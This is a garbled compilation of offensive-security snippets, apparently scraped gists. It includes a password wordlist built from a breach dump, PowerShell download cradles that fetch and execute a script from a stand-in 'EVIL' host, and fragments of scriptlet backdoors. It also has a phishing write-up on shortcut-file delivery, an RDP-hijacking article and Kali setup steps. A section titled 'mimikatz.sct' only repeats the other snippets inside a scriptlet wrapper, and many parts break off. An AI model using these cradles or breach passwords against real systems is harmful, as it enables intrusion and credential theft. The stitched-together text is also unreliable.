Adam M Toscher W00t3k

## breachcompilation.txt
wordlist created from original 41G stash via:

grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt

Then, compressed with:

7z a breachcompilation.txt.7z breachcompilation.txt

Size:

## DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')

# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

# Msxml2.XMLHTTP COM object

## Backdoor-Minimalist.sct
<?XML version="1.0"?>
<scriptlet>
<registration
    progid="PoC"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!--  License: BSD3-Clause -->
	<script language="JScript">
		<![CDATA[


## gist:398d80fa27950f555b8dd632c64c2992
D.UIJN.NL
that's me!

DECEMBER 28, 2016UNCATEGORIZED | 0 COMMENT
Shortcuts: another neat phishing trick
Recently I read a blog about a Locky campaign using windows shortcut files to infect users. The microsoft blog describes a large scale phishing attack send Windows shortcut files in zip archives. For more inforamtion see: The TechNet blog.. The trick revolves around the fact that cmd.exe and powershell.exe both allow for commands passed via arguments. Creating a shortcut with the command parameters included will allow for powershell exectuion with a double click.

We do allot of phishing attacks and for all the backdoor related stuff we rely heavily on office macro’s using PowerShell. Or one of the available script formats like .js/.wsf/.jse/.hta etc etc. The issue is that organisations are disabling macro’s via the group policy and script files are being blocked via web/e-mail channels. If you haven’t blocked the execution of Macro’s via the command line look at this.

The Locky campaign used a download an

## whitedome.com.au

Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W
The core version of the Re4son-Kernel is included in Kali Linux >= 2017.3.
On this site, I publish the latest version with these additional features:
Sticky Finger's Kali-Pi
Natively compiled
Includes kernel headers
Support for all common TFT screens
Ethernet gadget support
Latest Nexmon drivers with -m6 & -m7 support

## ALFA NETWORK ALFA NETWORK Inc. Blog


ALFA WiFi USB Support MacOS 10.13 ( High Sierra) Model List
**2017/12/5 Updated News: Here come AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH, AWUS036ACM, Tube-UN, UBDo-25, UBDo-n Mac OS X 10.13 driver. Download Driver: Mac 10.13**
**2017/11/28 Updated Note: AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH and AWUS036ACM ONLY work if you already installed in Mac OS X 10.12 and upgrade to Mac OS X 10.13. If the NEW Mac OS X 10.13 system, it will not work **
Note: MacOS 10.13 use the same MacOS 10.12 driver, therefore, please check MacOS 10.12 driver page, here is the link Mac OS X 10.12 driver link

Tips: If you don't see Alfa Utility icon on the top right system tray, you can go to Applications to find ALFA Wireless Utility folder and click "ALFA Wireless Utility" icon to enable Alfa Utility

Posted 23rd October 2017 by ALFA NETWORK

## gist:1b871bd815bf6230918a468fbad313a2
Lots of ways to trigger HTA in iexplore.exe 😀
{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}
Try .mhtml for example. No mime type.

## gist:b906ceab71a85f65348f8d0d45605a51

Go to the profile of Kevin Beaumont
Kevin BeaumontFollow
InfoSec, from the trenches of reality. Email kevin.beaumont@gmail.com | Twitter: @gossithedog on Twitter.
Mar 19, 2017
RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation
How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to defend against it.

Alexander Korznikov demonstrates using Sticky Keys and tscon to access an administrator RDP session — without even logging into the server.
Brief background on RDP session connection

## Kail on Win 10
1. Update your Windows 10 machine. Open an administrative PowerShell window and install the Windows Subsystem with this one-liner. A reboot will be required once finished.

Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
2. Once rebooted, open a command line shell and run the following commands to install the default Ubuntu environment. This will lay down the foundations for our Kali install.

lxrun /install
3. Setup and install the WSL Switcher, download a Kali base, and extract it to disk:

git clone https://github.com/RoliSoft/WSL-Distribution-Switcher.git
cd WSL-Distribution-Switcher

## mimikatz.sct
<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>
	wordlist created from original 41G stash via:

	grep -rohP '(?<=:).*$' \| uniq > breachcompilation.txt

	Then, compressed with:

	7z a breachcompilation.txt.7z breachcompilation.txt

	Size:
	# normal download cradle
	IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

	# PowerShell 3.0+
	IEX (iwr 'http://EVIL/evil.ps1')

	# hidden IE com object
	$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r

	# Msxml2.XMLHTTP COM object
	<?XML version="1.0"?>
	<scriptlet>
	<registration
	progid="PoC"
	classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<!-- License: BSD3-Clause -->
	<script language="JScript">
	<![CDATA[
	D.UIJN.NL
	that's me!

	DECEMBER 28, 2016UNCATEGORIZED \| 0 COMMENT
	Shortcuts: another neat phishing trick
	Recently I read a blog about a Locky campaign using windows shortcut files to infect users. The microsoft blog describes a large scale phishing attack send Windows shortcut files in zip archives. For more inforamtion see: The TechNet blog.. The trick revolves around the fact that cmd.exe and powershell.exe both allow for commands passed via arguments. Creating a shortcut with the command parameters included will allow for powershell exectuion with a double click.

	We do allot of phishing attacks and for all the backdoor related stuff we rely heavily on office macro’s using PowerShell. Or one of the available script formats like .js/.wsf/.jse/.hta etc etc. The issue is that organisations are disabling macro’s via the group policy and script files are being blocked via web/e-mail channels. If you haven’t blocked the execution of Macro’s via the command line look at this.

	The Locky campaign used a download an

	Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W
	The core version of the Re4son-Kernel is included in Kali Linux >= 2017.3.
	On this site, I publish the latest version with these additional features:
	Sticky Finger's Kali-Pi
	Natively compiled
	Includes kernel headers
	Support for all common TFT screens
	Ethernet gadget support
	Latest Nexmon drivers with -m6 & -m7 support


	ALFA WiFi USB Support MacOS 10.13 ( High Sierra) Model List
	2017/12/5 Updated News: Here come AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH, AWUS036ACM, Tube-UN, UBDo-25, UBDo-n Mac OS X 10.13 driver. Download Driver: Mac 10.13
	2017/11/28 Updated Note: AWUS036NH, AWUS036NEH, AWUS051NH v2, AWUS052NH and AWUS036ACM ONLY work if you already installed in Mac OS X 10.12 and upgrade to Mac OS X 10.13. If the NEW Mac OS X 10.13 system, it will not work
	Note: MacOS 10.13 use the same MacOS 10.12 driver, therefore, please check MacOS 10.12 driver page, here is the link Mac OS X 10.12 driver link

	Tips: If you don't see Alfa Utility icon on the top right system tray, you can go to Applications to find ALFA Wireless Utility folder and click "ALFA Wireless Utility" icon to enable Alfa Utility

	Posted 23rd October 2017 by ALFA NETWORK
	Lots of ways to trigger HTA in iexplore.exe 😀
	{3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}
	Try .mhtml for example. No mime type.

	Go to the profile of Kevin Beaumont
	Kevin BeaumontFollow
	InfoSec, from the trenches of reality. Email kevin.beaumont@gmail.com \| Twitter: @gossithedog on Twitter.
	Mar 19, 2017
	RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation
	How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to defend against it.

	Alexander Korznikov demonstrates using Sticky Keys and tscon to access an administrator RDP session — without even logging into the server.
	Brief background on RDP session connection
	1. Update your Windows 10 machine. Open an administrative PowerShell window and install the Windows Subsystem with this one-liner. A reboot will be required once finished.

	Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux
	2. Once rebooted, open a command line shell and run the following commands to install the default Ubuntu environment. This will lay down the foundations for our Kali install.

	lxrun /install
	3. Setup and install the WSL Switcher, download a Kali base, and extract it to disk:

	git clone https://github.com/RoliSoft/WSL-Distribution-Switcher.git
	cd WSL-Distribution-Switcher